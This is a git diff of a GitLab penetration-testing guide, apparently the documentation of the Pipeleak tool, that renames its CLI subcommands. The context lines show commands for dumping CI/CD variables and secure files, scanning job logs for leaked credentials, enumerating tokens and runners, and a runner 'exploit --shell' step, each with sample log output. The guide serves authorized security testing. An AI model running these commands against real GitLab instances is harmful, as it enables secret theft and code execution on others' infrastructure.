@@ -42,7 +42,7 @@ Make sure to verify manually as well.
4242> To create a Personal Access Token visit https://leakycompany.com/-/user_settings/personal_access_tokens
4343
4444``` bash
45- pipeleak vuln -g https://leakycompany.com -t glpat-[redacted]
45+ pipeleak gl vuln -g https://leakycompany.com -t glpat-[redacted]
46462024-11-14T14:29:05+01:00 INF GitLab version=17.5.1-ee
47472024-11-14T14:29:05+01:00 INF Fetching CVEs for this version version=17.5.1-ee
4848```
@@ -55,13 +55,13 @@ If you already have access to projects and groups you can try to enumerate CI/CD
5555Dump all CI/CD variables you have access to, to find more secrets.
5656``` bash
5757# Dump variables defined in the projects settings
58- pipeleak variables -g https://leakycompany.com -t glpat-[redacted]
58+ pipeleak gl variables -g https://leakycompany.com -t glpat-[redacted]
5959
6060# Schedules can have separately defined variables
61- pipeleak schedule -g https://leakycompany.com -t glpat-[redacted]
61+ pipeleak gl schedule -g https://leakycompany.com -t glpat-[redacted]
6262
6363# Secure files are an alternative to variables and often times contain sensitive info
64- pipeleak secureFiles --gitlab https://leakycompany.com --token glpat-[redacted]
64+ pipeleak gl secureFiles --gitlab https://leakycompany.com --token glpat-[redacted]
65652024-11-18T15:38:08Z INF Fetching project variables
66662024-11-18T15:38:09Z WRN Secure file content=" this is a secure file!!" downloadUrl=https://leakycompany.com/api/v4/projects/60367314/secure_files/9149327/download
67672024-11-18T15:38:12Z INF Fetched all secure files
@@ -143,7 +143,7 @@ There are many reasons why credentials might be included in the job output. More
143143[ Pipeleak] ( https://github.com/CompassSecurity/pipeleak ) can be used to scan for credentials in the job outputs.
144144
145145``` bash
146- $ pipeleak scan --token glpat-[redacted] --gitlab https://gitlab.example.com -c [gitlab session cookie]] -v -a -j 5 --confidence high-verified,high
146+ $ pipeleak gl scan --token glpat-[redacted] --gitlab https://gitlab.example.com -c [gitlab session cookie]] -v -a -j 5 --confidence high-verified,high
1471472024-09-26T13:47:09+02:00 DBG Verbose log output enabled
1481482024-09-26T13:47:10+02:00 INF Gitlab Version Check revision=2e166256199 version=17.5.0-pre
1491492024-09-26T13:47:10+02:00 DBG Setting up queue on disk
@@ -193,7 +193,7 @@ curl --request GET --header "PRIVATE-TOKEN: glpat-[redacted]" https://gitlab.com
193193}
194194
195195# Verify using Pipeleak
196- pipeleak enum -g https://gitlab.com -t glpat-[redacted]
196+ pipeleak gl enum -g https://gitlab.com -t glpat-[redacted]
1971972025-09-29T12:25:51Z INF Enumerating User
1981982025-09-29T12:25:51Z WRN Current user admin=false bot=false email=test@example.com name=" Pipe Leak" username=pipeleak_user
1991992025-09-29T12:25:51Z INF Enumerating Access Token
@@ -219,7 +219,7 @@ Runners can be attached globally, on the group level or on individual projects.
219219
220220Using pipeleak we can automate runner enumeration:
221221``` bash
222- $ pipeleak runners --token glpat-[redacted] --gitlab https://gitlab.example.com -v list
222+ $ pipeleak gl runners --token glpat-[redacted] --gitlab https://gitlab.example.com -v list
2232232024-09-26T14:26:54+02:00 INF group runner description=2-green.shared-gitlab-org.runners-manager.gitlab.com name=comp-test-ia paused=false runner=gitlab-runner tags=gitlab-org type=instance_type
2242242024-09-26T14:26:55+02:00 INF group runner description=3-green.shared-gitlab-org.runners-manager.gitlab.com/dind name=comp-test-ia paused=false runner=gitlab-runner tags=gitlab-org-docker type=instance_type
2252252024-09-26T14:26:55+02:00 INF group runner description=blue-3.saas-linux-large-amd64.runners-manager.gitlab.com/default name=comp-test-ia paused=false runner=gitlab-runner tags=saas-linux-large-amd64 type=instance_type
@@ -234,7 +234,7 @@ Pipeleak can generate a `.gitlab-ci.yml` or directly create a project and launch
234234
235235``` bash
236236# Manual creation
237- $ pipeleak runners --token glpat-[redacted] --gitlab https://gitlab.example.com -v exploit --tags saas-linux-small-amd64 --shell --dry
237+ $ pipeleak gl runners --token glpat-[redacted] --gitlab https://gitlab.example.com -v exploit --tags saas-linux-small-amd64 --shell --dry
2382382024-09-26T14:32:26+02:00 DBG Verbose log output enabled
2392392024-09-26T14:32:26+02:00 INF Generated .gitlab-ci.yml
2402402024-09-26T14:32:26+02:00 INF ---
@@ -260,7 +260,7 @@ pipeleak-job-saas-linux-small-amd64:
2602602024-09-26T14:32:26+02:00 INF Done, Bye Bye 🏳️🌈🔥
261261
262262# Automated
263- $ pipeleak runners --token glpat-[redacted] --gitlab https://gitlab.example.com -v exploit --tags saas-linux-small-amd64 --shell
263+ $ pipeleak gl runners --token glpat-[redacted] --gitlab https://gitlab.example.com -v exploit --tags saas-linux-small-amd64 --shell
2642642024-09-26T14:33:48+02:00 DBG Verbose log output enabled
2652652024-09-26T14:33:49+02:00 INF Created project name=pipeleak-runner-exploit url=https://gitlab.com/[redacted]/pipeleak-runner-exploit
2662662024-09-26T14:33:50+02:00 INF Created .gitlab-ci.yml file=.gitlab-ci.yml
@@ -311,4 +311,4 @@ If the GitLab instance has a container registry enabled, check if you have acces
311311Using [ TruffleHog] ( https://github.com/trufflesecurity/trufflehog ) :
312312``` bash
313313trufflehog docker --image registry.leakycompany.com/auser/arepo
314- ```
314+ ```
0 commit comments